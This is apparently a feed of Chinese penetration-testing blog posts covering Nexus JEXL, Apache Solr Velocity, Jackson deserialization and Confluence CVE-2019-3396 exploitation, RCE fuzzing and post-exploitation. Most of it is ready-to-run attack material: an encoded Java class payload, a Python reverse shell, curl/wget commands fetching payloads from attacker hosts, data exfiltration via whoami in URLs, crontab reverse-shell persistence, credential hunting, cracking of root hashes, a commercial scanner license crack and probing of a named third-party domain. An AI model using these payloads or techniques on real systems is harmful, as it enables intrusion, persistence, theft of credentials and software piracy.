x='CAFEBABE0000003100AE0A001F00560A005700580A005700590A005A005B0A005A005C0A005D005E0A005D005F0700600A000800610A006200630700640800650A001D00660800410A001D00670A006800690A0068006A08006B08004508006C08006D0A006E006F0A006E00700A001F00710A001D00720800730A000800740800750700760A001D00770700780A0079007A08007B08007C07007D0A0023007E0A0023007F0700800100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100114C4578706C6F69742F546573743233343B01000474657374010015284C6A6176612F6C616E672F537472696E673B29560100036F626A0100124C6A6176612F6C616E672F4F626A6563743B0100016901000149010003636D640100124C6A6176612F6C616E672F537472696E673B01000770726F636573730100134C6A6176612F6C616E672F50726F636573733B01000269730100154C6A6176612F696F2F496E70757453747265616D3B010006726573756C740100025B42010009726573756C745374720100067468726561640100124C6A6176612F6C616E672F5468726561643B0100056669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000C7468726561644C6F63616C7301000E7468726561644C6F63616C4D61700100114C6A6176612F6C616E672F436C6173733B01000A7461626C654669656C640100057461626C65010005656E74727901000A76616C75654669656C6401000E68747470436F6E6E656374696F6E01000E48747470436F6E6E656374696F6E0100076368616E6E656C01000B487474704368616E6E656C010008726573706F6E7365010008526573706F6E73650100067772697465720100154C6A6176612F696F2F5072696E745772697465723B0100164C6F63616C5661726961626C65547970655461626C650100144C6A6176612F6C616E672F436C6173733C2A3E3B01000A457863657074696F6E7307008101000A536F7572636546696C6501000C546573743233342E6A6176610C002700280700820C008300840C008500860700870C008800890C008A008B07008C0C008D00890C008E008F0100106A6176612F6C616E672F537472696E670C002700900700910C009200930100116A6176612F6C616E672F496E74656765720100106A6176612E6C616E672E5468726561640C009400950C009600970700980C0099009A0C009B009C0100246A6176612E6C616E672E5468726561644C6F63616C245468726561644C6F63616C4D617001002A6A6176612E6C616E672E5468726561644C6F63616C245468726561644C6F63616C4D617024456E74727901000576616C756507009D0C009E009F0C009B00A00C00A100A20C00A300A40100276F72672E65636C697073652E6A657474792E7365727665722E48747470436F6E6E656374696F6E0C00A500A601000E676574487474704368616E6E656C01000F6A6176612F6C616E672F436C6173730C00A700A80100106A6176612F6C616E672F4F626A6563740700A90C00AA00AB01000B676574526573706F6E73650100096765745772697465720100136A6176612F696F2F5072696E745772697465720C00AC002F0C00AD002801000F4578706C6F69742F546573743233340100136A6176612F6C616E672F457863657074696F6E0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000777616974466F7201000328294901000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0100136A6176612F696F2F496E70757453747265616D010009617661696C61626C6501000472656164010007285B4249492949010005285B4229560100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100176A6176612F6C616E672F7265666C6563742F41727261790100096765744C656E677468010015284C6A6176612F6C616E672F4F626A6563743B2949010027284C6A6176612F6C616E672F4F626A6563743B49294C6A6176612F6C616E672F4F626A6563743B010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B010006657175616C73010015284C6A6176612F6C616E672F4F626A6563743B295A0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100057772697465010005636C6F736500210026001F000000000002000100270028000100290000002F00010001000000052AB70001B100000002002A00000006000100000009002B0000000C000100000005002C002D00000009002E002F0002002900000304000400140000013EB800022AB600034C2BB60004572BB600054D2CB60006BC084E2C2D032CB60006B6000757BB0008592DB700093A04B8000A3A05120B57120CB8000D120EB6000F3A06190604B6001019061905B600113A07120B571212B8000D3A0819081213B6000F3A09190904B6001019091907B600113A0A120B571214B8000D3A0B190B1215B6000F3A0C190C04B60010013A0D03360E150E190AB80016A2003E190A150EB800173A0F190FC70006A70027190C190FB600113A0D190DC70006A70016190DB60018B60019121AB6001B990006A70009840E01A7FFBE190DB600183A0E190E121C03BD001DB6001E190D03BD001FB600203A0F190FB600183A101910122103BD001DB6001E190F03BD001FB600203A111911B600183A121912122203BD001DB6001E191103BD001FB60020C000233A1319131904B600241913B60025B100000003002A0000009600250000001600080017000D0018001200190019001A0024001B002E001D0033001F004200200048002100510023005B002500640026006A002700730029007D002A0086002B008C002D008F002F009C003100A5003200AA003300AD003500B6003600BB003700BE003900CE003A00D1002F00D7003D00DE003E00F4003F00FB004001110041011800420131004401380045013D0049002B000000DE001600A5002C00300031000F0092004500320033000E0000013E003400350000000801360036003700010012012C00380039000200190125003A003B0003002E0110003C003500040033010B003D003E0005004200FC003F00400006005100ED004100310007005B00E3004200430008006400DA004400400009007300CB00450031000A007D00C100460043000B008600B800470040000C008F00AF00480031000D00DE006000490043000E00F4004A004A0031000F00FB0043004B004300100111002D004C0031001101180026004D004300120131000D004E004F00130050000000340005005B00E3004200510008007D00C100460051000B00DE006000490051000E00FB0043004B0051001001180026004D005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n    y,\n   'Exploit.Test234',\n    z.getBytes('latin1'),    0,\n    3054\n);x.getMethod('test', ''.class).invoke(null, 'ifconfig');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}

getshell:

下载反弹文件
invoke(null, 'wget http://vps_to_your_py:8000/nc.py');
---
cat nc.py

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("vps_ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

----
your vps terminal:

nc -lvnp 18080
Listening on 0.0.0.0 1111
invoke(null, 'python nc.py');

即可。

[Read More]

「vulnhub」:Apace-RCE漏洞复现总结

Aug 22, 2020. | By: Bin4xin

Apache-solr-vuln

curl "http://192.168.137.181:8983/solr/admin/cores?indexInfo=false&wt=json"

{
  "responseHeader":{
    "status":0,
    "QTime":0},
  "initFailures":{},
  "status":{
    "demo":{
      "name":"demo",
      "instanceDir":"/var/solr/data/demo",
      "dataDir":"/var/solr/data/demo/data/",
      "config":"solrconfig.xml",
      "schema":"managed-schema",
      "startTime":"2020-08-22T01:42:03.422Z",
      "uptime":51628
          }
    }
}

关键是这个deomo:namel;instanceDir...,修改数据包Content-Type: application/json,post数据修改内容:

POST /solr/demo/config HTTP/1.1
Host: 192.168.137.181:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
/////////////////////////////////////////////////////////////////////////////////////

反包:
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=utf-8
Content-Length: 149

{
  "responseHeader":{
    "status":0,
    "QTime":425},
  "WARNING":"This response format is experimental.  It is likely to change in the future."}

rce payload:

solr/bin4xin/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

getshell:

$rt.getRuntime().exec(%27curl%20-o%20/tmp/nc.py%20http://www.chihou.pro:8000/nc.py%27)


wget%20-o%20/tmp/nc.py%20http://www.chihou.pro:8000/nc.py

$rt.getRuntime().exec(%27python%20/tmp/nc.py%27)

不过一般如果存在基本认证,就需要先过认证才行。

Apache ActiveMQ-vuln

  • 探测
Nmap scan report for 39.99.161.182
Host is up (0.095s latency).

PORT     STATE SERVICE VERSION
8161/tcp open  http    Jetty 8.1.16.v20140903
|_http-server-header: Jetty(8.1.16.v20140903)
|_http-title: Apache ActiveMQ

[Read More]

「vulnhub」:Json漏洞反序列化总结

Aug 14, 2020. | By: Bin4xin

区分 Fastjson 和 Jackson

post数据包: {“name”:”S”, “age”:21} 1 {“name”:”S”, “age”:21,”agsbdkjada__ss_d”:123} 1 这两个fastjson都不会报错,而jackson会报错,因为Jackson 因为强制key与javabean属性对齐,只能少不能多key,所以会报错。

cat jackson1.xml 

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>curl</value>
		<value>http://47.52.233.92:8000/pc.py</value>
            </array>
        </constructor-arg>
        <property name="any" value="#{ pb.start() }"/>
    </bean>
</beans>
----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
POST /exploit HTTP/1.1
Host: 192.168.43.14:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 142

{
  "param": [
   "org.springframework.context.support.FileSystemXmlApplicationContext",
   "http://47.52.233.92:8000/jackson1.xml"
  ]
}
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /jackson1.xml HTTP/1.1" 200 -
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /jackson1.xml HTTP/1.1" 200 -
223.246.173.228 - - [31/Aug/2020 16:05:12] code 404, message File not found
223.246.173.228 - - [31/Aug/2020 16:05:12] "GET /pc.py HTTP/1.1" 404 -

探测jackson

POST /jubaopen/api2/wealth/mail/getCheckCode HTTP/1.1
Host: dev.pactera.com
Content-Length: 24
DNT: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.58
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
timeStamp: 1597418145214
userId: undefined
token: undefined
deviceType: 2
Origin: http://dev.pactera.com
Referer: http://dev.pactera.com/jubaopen/weixin2/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

{"name":"S", "age":21}
HTTP/1.1 200 
Server: nginx/1.16.1
Date: Fri, 14 Aug 2020 15:21:32 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: POST,GET,PUT,OPTIONS,DELETE,PATCH
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Content-Length: 19469

{"code":null,"msg":null,"data":{"cause":null,"stackTrace":[{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"parse","fileName":"InternetAddress.java","lineNumber":696,"nativeMethod":false,"className":"javax.mail.internet.InternetAddress"},{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"parse","fileName":"InternetAddress.java","lineNumber":655,"nativeMethod":false,"className":
···
···
···
methodName":"run","fileName":"Thread.java","lineNumber":830,"nativeMethod":false,"className":"java.lang.Thread"}],"message":null,"suppressed":[],"localizedMessage":null}}

[Read More]

「Src」:Confluence漏洞复现总结

Jul 23, 2020. | By: Bin4xin

Confluence未授权RCE (CVE-2019-3396)

文件读取:

url:/confluence/rest/tinymce/1/macro/preview

{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../../../../../etc/passwd"}}}
RCE漏洞:

生成cmd.vm文件放在自己的服务器上。

cat cmd.vm
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

这个漏洞是相当于一个远程文件包含的原理,所以下面跑一个ftp然后在post包里包含,最后输出cmd执行命令即可。

python3 -m pyftpdlib -p 2121
[I 2020-07-23 15:47:58] concurrency model: async
[I 2020-07-23 15:47:58] masquerade (NAT) address: None
[I 2020-07-23 15:47:58] passive ports: None
[I 2020-07-23 15:47:58] >>> starting FTP server on 0.0.0.0:2121, pid=25460 <<<
执行命令:
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"ftp://www.chihou.pro:2121/cmd.vm","cmd":"whoami"}}}

下载shell反弹:
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"ftp://www.chihou.pro:2121/cmd.vm","cmd":"curl -o /tmp/nc.py ftp://www.chihou.pro:2121/nc.py"}}}

"python /tmp/nc.py"

[Read More]

「CS」:内网的渗透工具学习

Jun 22, 2020. | By: Bin4xin

  • opoos!wait plz~

[Read More]

aq域名工具

此处仅仅对于aq工具的报错进行部分记录,若存在无法解决的问题可以自行查询其他师傅的文章。

  • gem换源 gem安装软件之前一定要换源;
gem sources --add https://gems.ruby-china.com/ --remove https://rubygems.org/
npm config set registry https://registry.npm.taobao.org
  • 依赖报错
gem install aquatone && npm install electron && npm install nightmare
Building native extensions. This could take a while...
ERROR:  Error installing aquatone:
        ERROR: Failed to build gem native extension.

    current directory: /var/lib/gems/2.7.0/gems/ffi-1.13.1/ext/ffi_c
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20200713-12887-ohoa28.rb extconf.rb
mkmf.rb can't find header files for ruby at /usr/lib/ruby/include/ruby.h

You might have to install separate package for the ruby development
environment, ruby-dev or ruby-devel for example.

报什么依赖的错就安装上什么依赖,上面报的错单独拿下来,看到如下得报错。

  • You might have to install separate package for the ruby development environment, ruby-dev or ruby-devel for example.
$ sudo apt install ruby-devel
把依赖安装上就可以了

然后重新执行:

Building native extensions. This could take a while...
Successfully installed ffi-1.13.1
Successfully installed childprocess-0.7.1
Successfully installed multi_xml-0.6.0
When you HTTParty, you must party hard!
Successfully installed httparty-0.14.0
Successfully installed aquatone-0.5.0
Parsing documentation for ffi-1.13.1
Installing ri documentation for ffi-1.13.1
Parsing documentation for childprocess-0.7.1
Installing ri documentation for childprocess-0.7.1
Parsing documentation for multi_xml-0.6.0
Installing ri documentation for multi_xml-0.6.0
Parsing documentation for httparty-0.14.0
Installing ri documentation for httparty-0.14.0
Parsing documentation for aquatone-0.5.0
Installing ri documentation for aquatone-0.5.0
Done installing documentation for ffi, childprocess, multi_xml, httparty, aquatone after 6 seconds

+———————————————+
|export LC_ALL=C|
+———————————————+
  • npm换源 同gem:-)
npm install -g electron --registry=https://registry.npm.taobao.org

DEBUG=nightmare xvfb-run aquatone-gather -d ksyun.com --threads 10

npm install --save nightmare --unsafe-perm=true --allow-root --registry=https://registry.npm.taobao.org
https://gh0st.cn/archives/2018-09-02/1

问题

  • aq-gather的执行问题,报错有关于nightmare

同时这里aq存在一个问题,如果执行aq-gather报错那么就执行如下,就是下载一个shell脚本输出到bin文件夹下执行。

wget "https://gist.githubusercontent.com/random-robbie/beae1991e9ad139c6168c385d8a31f7d/raw/aq.sh" -O /bin/aq && chmod 777 /bin/aq 然后直接aq执行就可以。

  • aq报错:issue running aquatone:issue running aquatone
goroutine 6807 [running]:
runtime.throw(0x14dee2a, 0x21)

指定参数threads和time:降低线程数和增大超时时间,这里可以自行查看一下线程数的指定参数和timeout的指定格式。

awvs-linux安装

  • awvs13还是很香的。

为了保护原始license不失效,这里尽快执行如下的命令,不然license会被修改然后就无法破解成功。

root@kali:~# chattr +i /home/acunetix/.acunetix_trial/data/license/license_info.json
root@kali:~# rm -fr /home/acunetix/.acunetix_trial/data/license/wa_data.dat
root@kali:~# touch /home/acunetix/.acunetix_trial/data/license/wa_data.dat
root@kali:~# chattr +i /home/acunetix/.acunetix_trial/data/license/wa_data.dat
  • 个人强烈推荐:docker版本。

docker镜像下载的命令可以参考国光师傅的博客。

[Read More]

写在文前:

我们在web攻防期间有很多时候有一种感觉:那就是遇到rce漏洞时,bp放包的时候有一种隐隐的感觉,有的时候bp的反包字节大小莫名其妙的怪异,有经验的老师傅就索性直接跑RCE的fuzz字典,所以本篇就日常记录一些有关于web攻防期间的一些fuzz技巧

服务器RCE的fuzz技巧

  • Windows机器的fuzz

即我们可以在关键参数后面使用管道符号和连接符fuzz命令执行实现我们的盲打:

||和&

  • linux机器的fuzz

同上

||和&

  • Linux下过滤空格可以使用:
    ${IFS},$IFS,$IFS$9
    
  • JSON格式下的测试:
    \u000awget\u0020 http://ip
    

Linux下可以包括反引号,windows下不可以。

Linux下正常测试rce:

服务器启动web,注意需要处于监听状态下启动:

bin4xin@bin4xin's MacbookPro tools % python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...

rce fuzz命令如下:

bin4xin@bin4xin's MacbookPro tools % curl 192.168.101.51:8000/`whoami`

同时我们反过来看web日志记录:

::ffff:192.168.101.51 - - [19/Sep/2020 13:57:25] "GET /bin4xin HTTP/1.1" 301 -

同理各位可以发散思维:

ping whoami.服务器地址

如上,ping、curl同样适用。

一些特殊字符绕过姿势:

curl http://服务器地址/$(whoami)

curl http://服务器地址/$(whoami|base64)

'w'g'e't${IFS}服务器地址

各位可以自行实验在linux下的效果。

Windows探测:

fuzz技巧是一样的,只是fuzz命令有一些区别;

ping %USERNAME%.服务器地址
------
(获取计算机名)
for /F %x in ('whoami') do start http://服务器地址/%x
------
(获取用户名称)
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.服务器地址
------
测试邮箱:`wget%209服务器地址/xxxx`@qq.com

测试上传:`sleep 10`filename

测试filenname:`||wget%20服务器地址`

测试上传处下的名称: ;payload|payload&payload
;whoami|whoami&whoami
------

个人机器信息收集

  1. 浏览器[Chrome,Firefox,Edge,IE,360,QQ ]信息(历史记录,密码,书签,cookie):

    %LocalAppData%\Google\Chrome\User Data\Default
    %APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\
    
  2. 机器内敏感文件,关键词:账号、密码、备份、登录、管理、邮箱、后台、资产、网络

    for /r D:\ %i in (*密码*) do @echo %i
    for /r D:\ %i in (*vpn*) do @echo %i
    for /r D:\ %i in (*账号*) do @echo %i
    
  3. 机器进程

    • 杀软/edr
    • teamviewer/等远程管理工具
    • 服务类进程:mssql/java/web服务
  4. 安装软件列表

  5. 当前windows 凭证管理器存储的密码

    • 登录密码(mimikatz)

    • wifi密码

    • outlook密码

    • ……

  6. 机器开放端口信息/防火墙信息/获取机器共享

    netstat -naop
    wmic share  get name,path,status  #利用wmic查找共享
    
  7. 获取机器所有rdp连接记录

  8. 获取所有盘符

    wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,volumeserialnumber,size #查看分区
    
  9. 获取全盘所有敏感文件

    .doc\xlsx\md\sql\ppt*\txt

    for /r D:\ %i in (*.doc) do @echo %i
    for /r D:\ %i in (*.xlsx) do @echo %i
    for /r D:\ %i in (*.ppt*)) do @echo %i
    
  10. 本地环境

    • hosts
    • 环境变量
    • 补丁列表
    • 当前主机的会话信息

工作不饱和 总结了一下个人办公机信息收集思路

[Read More]

经历过几次HW行动,每次HW都运气较好可以拿到服务器,于是每次公司的内网渗透的任务就交给我,记录一下对于内网的信息搜集过程,以及在此过程中我自己所积累的小技巧。

passwd

一般来说通过shirostruts2拿到的shell基本都是root,很多人都会直接去读取passwd文件,其实并不可取。下面展示一下2核4G服务器跑hash文件的过程。一般是跑不出来的,hash过程较难逆,除非存在彩虹表,一般都跑不出来。

hashcat -m 1800 -a 0 -o found.txt linux-root.txt /usr/share/john/password.lst --force
hashcat (v4.0.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz, 256/738 MB allocatable, 1MCU

Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Uses-64-Bit

Password length minimum: 0
Password length maximum: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'
* Device #1: Kernel m01800.8f866878.kernel not found in cache! Building may take a while...

继续 :(

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => Dictionary cache built:
* Filename..: /usr/share/john/password.lst
* Passwords.: 3559
* Bytes.....: 26325
* Keyspace..: 3559
* Runtime...: 0 secs

- Device #1: autotuned kernel-accel to 128
- Device #1: autotuned kernel-loops to 128
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => [s]tatus [p]ause [r]esume [b]ypass [c]heckpoApproaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: linux-root.txt
Time.Started.....: Mon Jun  8 11:29:25 2020 (23 secs)
Time.Estimated...: Mon Jun  8 11:29:48 2020 (0 secs)
Guess.Base.......: File (/usr/share/john/password.lst)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      311 H/s (8.82ms)
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 7118/7118 (100.00%)
Rejected.........: 0/7118 (0.00%)
Restore.Point....: 3559/3559 (100.00%)
Candidates.#1....: doom2 -> sss
HWMon.Dev.#1.....: N/A

Started: Mon Jun  8 11:28:50 2020
Stopped: Mon Jun  8 11:29:49 2020

一般建议可以以root用户新建用户来维持权限,或者是写入corntab计划来定时反弹shell。实操中几乎很少有运维、开发去检查定时计划的反弹shell脚本,所以基本上可以满足后持续渗透的条件。

信息搜集阶段

  • 配置文件

数据库配置信息 通过mybatis等配置文件就可以拿到内网中对应的数据库机器,一般都是低权限,运气好可以拿到高权限。运气再好一点存在高权限的mssql数据库可以尝试连接一下尝试xp_cmd_shell来执行命令。

有的时候拿到的机器或多或少存在一些特殊情况,比如docker机器、单纯的一个数据库机器,那么就尽力而为去做一些搜集工作,特别是docker机器,除了跑的服务,机器里面太干净了,基本没有什么可以利用的地方。

在当前目录下搜索存在字符为'mysql'的文件
grep -rn "mysql" .
=======
查看对应系统的敏感配置文件
cat static/scripts/tinymce/js/tinymce/plugins/jbimages/ci/application/config/database.php
=======
curl ifconfig.me
120.25.13.49

我们通过web层面拿到的机器,一般都是web服务器,即存在各种jar包,所以服务器里会存放大量配置文件

ps -ef|grep java

netstat -ANTUP

通过进程任务可以查找到部署jar包的目录和相对应依赖,大部分运维和开发都习惯于在根目录下新建data目录或者是非系统文件夹下的目录存在web的依赖jar包,我们就可以从这点做突破口。查看一下端口开放情况和对应的目录位置,有一些shell的基础就可以搜集到这些信息。

  • bash_history

命令执行历史文件一般建议必看,里面会存着一些意想不到的内容,下面截取一小部分我在内网实战中发现的惊喜:

su root
crontab -e
su rppt
su root
crontab -e
crontab -l
ll
cd domain/
ll
cd nexus3/
ll
cd nexus-3.12.0-01
ll
cd bin/
./nexus start
pactera@575
cd domain/
ll
cd nexus3/

注意./nexus startcd domain/两条命令中间的那个“命令”,对,没错那个是sudoer用户的密码,su切换直接就拥有root权限。我们分析一下为什么出现这样的现象:个人认为是在运行nexus程序是需要密码来提升权限,然后输入者在等待过程中没有发现输入密码的shell还没有回显出来就输入了密码,从而导致密码被系统当作执行命令记录进了history文件。


发现这个后,我第一时间去看了自己服务器和自己的mac本上的历史文件,搜索机器密码关键词,同时也存在这样的现象明文密码存在了里面

醍醐灌顶

总结下来,内网的信息收集需要的是细心。

内网穿透

在写之前我们需要明确一点,就是我们所需要的内网目标是什么? 而内网穿透和内网代理的分别在哪里? 在什么情况我们需要做内网穿透,什么时候我们需要做内网代理?

python3 reGeorgSocksProxy.py -p 9999 -l 0.0.0.0 -u https://www.pgyer.com/tunnel.nosocket.php

内网穿透就是针对一个机器下的某一个特定端口,通过流量转发的形式把端口暴露在公网上,举个例子,我们拿下了一个linux机器,很巧这个机器是运维机器,我们发现了大量的运维账号密码。 又然后,发现windows的远程登录服务即3389端口,所以我们在这个时候可以使用端口服务转发的技巧,把端口流量转发到一个我们可控公网的端口上(如33890),那么我们在对我们自己可控公网的端口上进行数据请求的时候,就是在对这个windows机器的数据请求,所以我们可以很轻松的使用我们的到的账号和密码来连接对应的windows机器。

所以我们做内网穿透的最终目的,很显然是: 我们在已知某个内网服务器的敏感信息(如3389远程连接账号密码、3306连接账号密码),而我们在内网又无法使用windows机器远程连接、mysql-client软件对我们所得到的信息进行明确验证时,那么这个时候我们可以使用内网穿透即流量转发的手段来进行进一步验证。

内网代理

内网代理,顾名思义就是我们自己可控的本机,通过各种代理方法(s5、s4),把拿下的内网服务器当作流量转发的一个中间跳板,对内网进行一系列我们想做的事情。这种情况下,我们的代理机器在内网没有具体的一个身份,只是我们通过代理的方式把我们对内网所发出的流量通过内网可控服务器向内网进行请求。

frp代理

极力推荐。挂了代理就已经进入了内网,十分方便。只需要配置vps(frps)端,拿下shell后下载frpc客户端,启动服务就可以。 windows:proxifier linux:frpc

lcx代理

没用过,听过。

[Read More]

「Docker」:use docker elegant:)

May 27, 2020. | By: Bin4xin

网上有很多关于vulhub的docker构建教程,就不重复造轮子了。记录一些日常使用dokcer遇到的问题

docker常用

连接重置

Burp Suite Professional Error Connection reset 当前无法使用此页面 当前无法处理此请求。HTTP ERROR 503

之前做一个struts2/s2-057的漏洞复现,因为是自己的服务器就各种造,扫描器什么的一把梭。最后靶场被玩儿坏了。尝试能不能重装镜像解决:( 这里我随便拿了一个镜像举列子

docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
xdebug-rce_php      latest              6026f10530db        3 days ago          393MB
vulhub/php          7.1.12-apache       10fffe5b286c        2 years ago         392MB
vulhub/tomcat       8.5                 66ba03f6c1d8        3 years ago         367MB
vulhub/tomcat       8.0                 458575a05d97        3 years ago         357MB

删除本地镜像

docker rmi 6026f10530db
Untagged: xdebug-rce_php:latest
Deleted: sha256:6026f10530db39c61d31e0461ccbff4786e8c604c34f8ff8167d7ac89c81446a
Deleted: sha256:4ce36271980f0f494e1a935bdaced37ea38d08fb167d54c50440fc009df315f9
Deleted: sha256:d43d3fbbbb36edd2dbedd5df458789c7c57b5fd366403830bb6ac01b42b743d7
Deleted: sha256:b15d563c13eccd51017c2bfa269f322744cb476c4c62749d5356cd0069d6391d

如果报错提示无法删除,大概率情况下是指定删除的镜像docker内在运行,直接停止就行。

docker rm 6026f10530db删除已停止的容器
docker rm -f 6026f10530db删除正在运行的容器

进入容器执行命令

重要的是CONTAINER ID值,执行docker ps查看就可以:

sudo docker exec -it 775c7c9ee1e1 /bin/bash
  • 报错:
